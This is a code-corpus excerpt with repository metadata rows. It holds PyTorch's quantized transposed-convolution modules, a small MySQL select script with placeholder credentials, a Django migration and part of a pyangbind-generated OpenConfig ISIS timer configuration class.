groups, bias, padding_mode, **factory_kwargs)
def _input_padding(self, kernel_size: List[int], dilation: List[int], padding: List[int]) -> List[int]:
res = torch.jit.annotate(List[int], [])
for kdx in range(len(kernel_size)):
pad = (dilation[kdx] * (kernel_size[kdx] - 1) - padding[kdx])
res.append(pad)
return res
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
# derived classes override cls._FLOAT_MODULE attribute
msg = ' nnq.' + cls.__name__ + '.from_float only works for ' + \
cls._FLOAT_MODULE.__name__ # type: ignore[attr-defined]
assert type(mod) == cls._FLOAT_MODULE, msg
assert hasattr(mod, 'qconfig'), \
'Input float module must have qconfig defined.'
weight_post_process = mod.qconfig.weight()
weight_post_process(mod.weight)
assert weight_post_process.dtype == torch.qint8, \
'Weight observer must have a dtype of qint8'
qweight = _quantize_weight(mod.weight.float(), weight_post_process)
# the __init__ call used is the one from derived classes and not the one from _ConvTransposeNd
qconv = cls(mod.in_channels, mod.out_channels, mod.kernel_size, # type: ignore[call-arg]
mod.stride, mod.padding, mod.output_padding, mod.groups,
mod.bias is not None, mod.dilation, mod.padding_mode)
qconv.set_weight_bias(qweight, mod.bias)
if not hasattr(mod, "activation_post_process") or mod.activation_post_process.dtype == torch.float:
return qconv # dynamic quantization doesn't need scale/zero_point
else:
act_scale, act_zp = mod.activation_post_process.calculate_qparams()
qconv.scale = float(act_scale)
qconv.zero_point = int(act_zp)
return qconv
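# --- Illustrative sketch (not part of the upstream module) ---
# from_float above obtains (scale, zero_point) from the activation observer and
# quantizes the float weight via _quantize_weight. Conceptually, per-tensor
# affine quantization maps a float x to clamp(round(x / scale) + zero_point,
# qmin, qmax); the function below is a pure-Python restatement of that mapping,
# not the actual torch kernel (observer rounding details differ).
def quantize_affine_sketch(x, scale, zero_point, qmin=-128, qmax=127):
    # qint8 default range; the real path dispatches to quantized torch ops.
    q = round(x / scale) + zero_point
    return max(qmin, min(qmax, q))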
class ConvTranspose1d(_ConvTransposeNd):
r"""Applies a 1D transposed convolution operator over an input image
composed of several input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.ConvTranspose1d`.
.. note:: Currently only the QNNPACK engine is implemented.
Please set `torch.backends.quantized.engine = 'qnnpack'`
For special notes, please see :class:`~torch.nn.quantized.Conv1d`
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.ConvTranspose1d` for other attributes.
Examples::
>>> torch.backends.quantized.engine = 'qnnpack'
>>> # With square kernels and equal stride
>>> m = nnq.ConvTranspose1d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nnq.ConvTranspose1d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))
>>> input = torch.randn(20, 16, 50)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
>>> # exact output size can be also specified as an argument
>>> input = torch.randn(1, 16, 12)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> downsample = nnq.Conv1d(16, 16, 3, stride=2, padding=1)
>>> upsample = nnq.ConvTranspose1d(16, 16, 3, stride=2, padding=1)
>>> h = downsample(q_input)
>>> h.size()
torch.Size([1, 16, 6])
>>> output = upsample(h, output_size=input.size())
>>> output.size()
torch.Size([1, 16, 12])
"""
_FLOAT_MODULE = nn.ConvTranspose1d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, output_padding=0, groups=1, bias=True,
dilation=1, padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
output_padding = _single(output_padding)
super(ConvTranspose1d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConvTranspose1d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
self._packed_params = torch.ops.quantized.conv_transpose1d_prepack(
w, b, self.stride, self.padding, self.output_padding, self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv_transpose1d_unpack(self._packed_params)
return w, b
def weight(self):
(w, _) = self._weight_bias()
return w
def bias(self):
(_, b) = self._weight_bias()
return b
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 3:
raise ValueError("Input shape must be `(N, C, L)`!")
return torch.ops.quantized.conv_transpose1d(
input, self._packed_params, self.scale, self.zero_point)
class ConvTranspose2d(_ConvTransposeNd):
r"""Applies a 2D transposed convolution operator over an input image
composed of several input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.ConvTranspose2d`.
For special notes, please see :class:`~torch.nn.quantized.Conv2d`
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.ConvTranspose2d` for other attributes.
Examples::
>>> # QNNPACK or FBGEMM as backend
>>> torch.backends.quantized.engine = 'qnnpack'
>>> # With square kernels and equal stride
>>> m = nnq.ConvTranspose2d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nnq.ConvTranspose2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))
>>> input = torch.randn(20, 16, 50, 100)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
>>> # exact output size can be also specified as an argument
>>> input = torch.randn(1, 16, 12, 12)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> downsample = nnq.Conv2d(16, 16, 3, stride=2, padding=1)
>>> upsample = nnq.ConvTranspose2d(16, 16, 3, stride=2, padding=1)
>>> h = downsample(q_input)
>>> h.size()
torch.Size([1, 16, 6, 6])
>>> output = upsample(h, output_size=input.size())
>>> output.size()
torch.Size([1, 16, 12, 12])
"""
_FLOAT_MODULE = nn.ConvTranspose2d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, output_padding=0, groups=1, bias=True,
dilation=1, padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
output_padding = _pair(output_padding)
super(ConvTranspose2d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConvTranspose2d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
self._packed_params = torch.ops.quantized.conv_transpose2d_prepack(
w, b, self.stride, self.padding, self.output_padding, self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv2d_unpack(self._packed_params)
return w, b
def weight(self):
(w, _) = self._weight_bias()
return w
def bias(self):
(_, b) = self._weight_bias()
return b
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 4:
raise ValueError("Input shape must be `(N, C, H, W)`!")
return ops.quantized.conv_transpose2d(
input, self._packed_params, self.scale, self.zero_point)
class ConvTranspose3d(_ConvTransposeNd):
r"""Applies a 3D transposed convolution operator over an input image
composed of several input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.ConvTranspose3d`.
.. note:: Currently only the FBGEMM engine is implemented.
Please set `torch.backends.quantized.engine = 'fbgemm'`
For special notes, please see :class:`~torch.nn.quantized.Conv3d`
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.ConvTranspose3d` for other attributes.
Examples::
>>> torch.backends.quantized.engine = 'fbgemm'
>>> # With cubic kernels and equal stride
>>> m = nnq.ConvTranspose3d(16, 33, 3, stride=2)
>>> # non-cubic kernels and unequal stride and with padding
>>> m = nnq.ConvTranspose3d(16, 33, (3, 3, 5), stride=(2, 1, 1), padding=(4, 2, 2))
>>> input = torch.randn(20, 16, 50, 100, 100)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
>>> # exact output size can be also specified as an argument
>>> input = torch.randn(1, 16, 12, 12, 12)
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> downsample = nnq.Conv3d(16, 16, 3, stride=2, padding=1)
>>> upsample = nnq.ConvTranspose3d(16, 16, 3, stride=2, padding=1)
>>> h = downsample(q_input)
>>> h.size()
torch.Size([1, 16, 6, 6, 6])
>>> output = upsample(h, output_size=input.size())
>>> output.size()
torch.Size([1, 16, 12, 12, 12])
"""
_FLOAT_MODULE = nn.ConvTranspose3d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, output_padding=0, groups=1, bias=True,
dilation=1, padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
output_padding = _triple(output_padding)
super(ConvTranspose3d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConvTranspose3d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
self._packed_params = torch.ops.quantized.conv_transpose3d_prepack(
w, b, self.stride, self.padding, self.output_padding, self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv3d_unpack(self._packed_params)
return w, b
def weight(self):
(w, _) = self._weight_bias()
return w
def bias(self):
(_, b) = self._weight_bias()
return b
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 5:
raise ValueError("Input shape must be `(N, C, T, H, W)`!")
return ops.quantized.conv_transpose3d(
input, self._packed_params, self.scale, self.zero_point)
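# --- Illustrative sketch (not part of the upstream module) ---
# _ConvTransposeNd._input_padding above derives the implicit input padding of a
# transposed convolution as dilation * (kernel_size - 1) - padding, one entry
# per spatial dimension. A minimal pure-Python restatement of that loop:
def _input_padding_sketch(kernel_size, dilation, padding):
    # One entry per spatial dimension, mirroring the kdx loop in _input_padding.
    return [dilation[k] * (kernel_size[k] - 1) - padding[k]
            for k in range(len(kernel_size))]
# e.g. a 3x3 kernel with dilation 1 and padding 1 yields [1, 1].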
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
55f8f0d9a4d02a624dfc1d1931ebe55eca75f4a1 | c6ca3fd35bd0e36ab1c3427bd4dfd55fd8cff0f7 | 2020/october/1/11-Oct/mysql(17).py | fd61ec2fe274cb61f84bcc0724e5769b0c5bfbcc | [] | no_license | mohanbabu2706/testrepo | 23ae942d1af4bfbc31c9266daadfd8f9dce431a6 | 5d75d9c65f7174a7418cdc3d00580b99a11f67d0 | refs/heads/master | 2023-01-03T23:48:56.365958 | 2020-11-01T06:38:46 | 2020-11-01T06:38:46 | 300,142,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py |
import mysql.connector
mydb = mysql.connector.connect(
host = "localhost",
user = "myusername",
password = "mypassword",
database = "mydatabase",
)
mycursor = mydb.cursor()
sql = "SELECT * FROM customers ORDER BY name DESC"
mycursor.execute(sql)
myresult = mycursor.fetchall()
for x in myresult:
print(x)
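# --- Illustrative sketch (assumption: no MySQL server is available here) ---
# The same cursor / execute / fetchall pattern as the script above, restated
# with the stdlib sqlite3 module so it runs without a database server. The
# customers table and its row values are made up for illustration.
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE customers (name TEXT)")
cur.executemany("INSERT INTO customers (name) VALUES (?)", [("Amy",), ("Ben",)])
cur.execute("SELECT * FROM customers ORDER BY name DESC")
for row in cur.fetchall():
    print(row)  # rows come back in descending name order: ('Ben',), ('Amy',)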
| [
"noreply@github.com"
] | mohanbabu2706.noreply@github.com |
d4dc2c5f7f03abab95daa5989886ca06a7db4c6c | d7589054c9dbcccdfee4213fda2df10f249a60a8 | blogposts/migrations/0002_auto_20190622_1254.py | 457e9049564ff51cde1fcc2835f3ba4312831161 | [] | no_license | Ruckaiya/djangoblog | aa3e16ce84f37a70b830a795acf450b04b5c5bca | a76c5d223477d29b391915c3778219a36f9f34ce | refs/heads/master | 2020-06-09T00:26:51.396663 | 2019-06-23T10:47:43 | 2019-06-23T10:47:43 | 193,334,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py |
# Generated by Django 2.2.2 on 2019-06-22 06:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogposts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='latestpost',
name='timestamp',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='popular',
name='timestamp',
field=models.DateTimeField(),
),
]
| [
"ruckaiya.awf5@gmail.com"
] | ruckaiya.awf5@gmail.com |
ca2b1b48748cf7dbf82a3c4d89d82d047927b481 | 70cdf0741a22c678401a306229003bf036ffe5a6 | ocbind/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/config/__init__.py | e04f44eb1c83f1fb35643a331525799b5ac14be0 | [] | no_license | zsblevins/nanog81-hackathon | 5001e034339d6b0c6452ae2474f06916bcd715cf | 1b64fd207dd69837f947094fbd6d6c1cea3a1070 | refs/heads/main | 2023-03-03T09:39:28.460000 | 2021-02-15T13:41:38 | 2021-02-15T13:41:38 | 336,698,856 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,458 | py |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
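# --- Illustrative sketch (not part of the generated bindings) ---
# spf-hold-interval above is modelled as a uint64 with a default of 5000 ms;
# the RestrictedClassType rejects values outside 0..18446744073709551615.
# A minimal pure-Python restatement of that range check (the names below are
# invented for illustration):
def check_uint64(value):
    # Mirrors the restriction_dict range '0..18446744073709551615'.
    if not 0 <= value <= 18446744073709551615:
        raise ValueError("value must be in 0..18446744073709551615")
    return value

DEFAULT_SPF_HOLD_INTERVAL_MS = check_uint64(5000)  # default carried by spf-hold-interval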
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
